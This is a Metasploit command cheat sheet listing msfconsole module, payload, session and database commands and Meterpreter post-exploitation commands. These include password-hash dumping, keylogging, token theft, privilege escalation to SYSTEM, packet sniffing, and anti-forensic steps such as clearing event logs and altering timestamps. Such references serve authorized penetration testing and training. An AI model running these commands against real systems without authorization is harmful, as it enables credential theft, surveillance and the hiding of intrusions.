Using-the-metasploit-framework

MSFconsole Commands

• Show all exploits:

show exploits

• Show all payloads:

show payloads

• Show all auxiliary modules:

show auxiliary

• Search for a module:

search <name>

• Load information about a specific module:

info

• Load an exploit or module:

use <name>

• Load an exploit by index number:

use <number>

• Set Local Host IP (LHOST):

set LHOST <ip>

• Set Remote Host IP (RHOST):

set RHOST <ip>

• Set a specific option value:

set <option> <value>

• Set a global option value:

setg <option> <value>

• Display available options for a module:

show options

• Display supported platforms for the exploit:

show targets

• Specify the target index:

set target <number>

• Set the desired payload:

set payload <payload>

• Display advanced options for a module:

show advanced

• Automatically migrate to another process after exploitation:

set autorunscript migrate -f

• Check if a target is vulnerable:

check

• Execute the module or exploit:

exploit

• Run the exploit in the background:

exploit -j

• Run without interacting with the session:

exploit -z

• Specify a payload encoder:

exploit -e <encoder>

• Display help for the exploit command:

exploit -h

• List available sessions:

sessions -l

• List sessions with verbose details:

sessions -v

• Run a script on all live sessions:

sessions -s <script>

• Kill all active sessions:

sessions -K

• Run a command across all sessions:

sessions -c <cmd>

• Upgrade a shell to a Meterpreter session:

sessions -u <sessionID>

• Create a new database:

db_create <name>

• Connect to an existing database:

db_connect <name>

• Use Nmap and store results in the database:

db_nmap <args>

• Delete the current database:

db_destroy

Meterpreter Commands

• Display Meterpreter help:

help

• Run a Meterpreter script:

run <scriptname>

• Show target system information:

sysinfo

• List files and directories:

ls

• Load the privilege extension:

use priv

• List running processes:

ps

• Migrate to a specific process by ID:

migrate <pid>

• Load incognito functions:

use incognito

• List user tokens:

list_tokens -u

• List group tokens:

list_tokens -g

• Impersonate a token:

impersonate_token <DOMAIN\\USERNAME>

• Steal a process token:

steal_token <pid>

• Stop token impersonation:

drop_token

• Attempt privilege escalation to SYSTEM:

getsystem

• Drop into an interactive shell:

shell

• Run a command interactively:

execute -f <cmd.exe> -i

• Revert to the original user:

rev2self

• Interact with the registry:

reg <command>

• Switch to another desktop:

setdesktop <number>

• Capture a screenshot:

screenshot

• Upload a file to the target:

upload <file>

• Download a file from the target:

download <file>

• Start keylogging:

keyscan_start

• Dump captured keystrokes:

keyscan_dump

• Stop keylogging:

keyscan_stop

• Get available privileges:

getprivs

• Take control of input devices:

uictl enable <keyboard/mouse>

• Background the current session:

background

• Dump password hashes:

hashdump

• Load the sniffer module:

use sniffer

• List network interfaces:

sniffer_interfaces

• Start sniffing on an interface:

sniffer_start <id> <packet-buffer>

• Dump captured packets:

sniffer_dump <id> <filename>

• Stop packet sniffing:

sniffer_stop <id>

• Clear event logs:

clearev

• Modify file timestamps:

timestomp

• Reboot the target machine:

reboot